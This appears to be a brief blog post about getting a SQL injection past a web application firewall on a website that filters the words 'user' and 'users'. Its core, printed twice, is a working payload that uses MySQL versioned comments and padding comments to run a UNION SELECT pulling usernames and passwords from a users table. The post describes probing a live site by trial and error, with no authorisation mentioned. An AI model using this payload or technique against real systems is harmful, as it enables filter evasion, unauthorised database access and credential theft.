lcat — An absurd approach to bypass WAF during SQL Injection

An absurd approach to bypass WAF during SQL Injection

So.. apparently this SQL injectable website does not allow `user` or `users` keyword. But.. `id=user` and `id=users` are allowed. I have no time to determine what WAF rules are applied. All I know is that I don't really know when they will drop a request. I just try something and see if it works. And then suddenly after randomly mashing my keys to find a working payload, this worked: ```sql '+/*!40000union*/select+/*randomlongstringhehehehehe*/user,password+from/*anotherlongstringhehehehehe*/users%23 ``` ![meme](https://media1.giphy.com/media/75ZaxapnyMp2w/giphy.gif?cid=82a1493bo5pilm1fg2x9civ1onssnorq1gqj4l8125d5durt&ep=v1_gifs_related&rid=giphy.gif&ct=g)

So.. apparently this SQL injectable website does not allow user or users keyword.

But.. id=user and id=users are allowed. I have no time to determine what WAF rules are applied. All I know is that I don't really know when they will drop a request. I just try something and see if it works.

And then suddenly after randomly mashing my keys to find a working payload, this worked:

'+/*!40000union*/select+/*randomlongstringhehehehehe*/user,password+from/*anotherlongstringhehehehehe*/users%23

meme

Created: 2024-01-29 16:17:37, Updated: 2024-01-29 16:19:03, ID: c29f05ae-60ef-4ff0-8121-9423aa8a95ca